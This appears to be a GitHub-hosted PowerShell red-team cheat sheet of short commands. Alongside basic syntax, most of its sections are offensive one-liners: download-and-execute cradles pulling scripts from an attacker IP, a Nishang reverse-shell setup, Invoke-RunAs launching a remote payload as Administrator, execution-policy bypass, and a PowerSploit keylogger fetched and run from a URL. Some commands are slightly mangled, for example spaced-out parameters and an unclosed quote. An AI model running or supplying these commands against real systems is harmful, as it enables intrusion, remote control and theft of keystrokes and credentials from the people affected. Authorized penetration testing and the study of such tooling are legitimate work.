RedTeam_CheatSheet.ps1 · GitHub
Basic commands
Help
Copy Get-Help < command > - Detailed
Display all properties
Copy < command > | Select-Object - Property *
< command > | Select *
Get file contents (like type
or cat
which is actually available as an alias, I guess)
Delete directory recursive
Copy Remove-Item - Recurse - Force < dir >
Write output to file
Copy < command > | Out-File < file >
Count
Measures (Count, Avg, etc.)
Copy < command > | Measure-Object
Whoami
-> SeImpersonatePrivilege (Potato exploits, PrintSpoofer, etc.)
Download file
Copy IEX( New-Object Net.WebClient).downloadString( '<url>' ) `
or
Check architecture
Copy [ environment ]::Is64BitOperatingSystem
[ environment ]::Is64BitProcess
64bit PowerShell path
Copy C:\Windows\SysNative\WindowsPowerShell\v1. 0 \PowerShell
Base64 encode file
Copy $fc = Get-Content "filename"
$fe = [ System.Text.Encoding ]::UTF8.GetBytes($fc)
[ System.Convert ]::ToBase64String($fe)
Nishang
Offensive PowerShell for red team, penetration testing and offensive security.
GitHub - samratashok/nishang
Gather information
Copy powershell - ExecutionPolicy bypass - file Get-Information.ps1 > results.txt
Get wifi creds
Reverse shell
Copy / usr / share / nishang / Shells / Invoke-PowerShellTcp.ps1
-> Append Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port>
to Invoke-PowerShellTcp.ps1
to automatically execute the shell
Remote execution
Copy powershell IEX ( New-Object System.Net.WebClient).DownloadString( 'http://<ip>/Invoke-PowerShellTcp.ps1' )
Copy powershell - NoProfile - ExecutionPolicy unrestricted - Command IEX ( New-Object System.Net.WebClient).DownloadString( 'http://<ip>/Invoke-PowerShellTcp.ps1' )
PowerShell-Suite
This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind.
GitHub - FuzzySecurity/PowerShell-Suite
Copy Invoke-RunAs - User Administrator - Password < pw > - LogonType 0x1 - Binary c:\Windows\SysNative\WindowsPowerShell\v1. 0 \ PowerShell.exe - Args "IEX(New-Object Net.WebClient).downloadString('http://<ip>/shell.ps1')"
-> Put at the bottom of Invoke-RunAs.ps1, if not working otherwise
Keylogger
Copy IEX ( New-Object Net.WebClient).DownloadString( 'https://raw.github.com/mattifestation/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1)
Get-Keystrokes -LogPath C:\key.log -CollectionInterval 1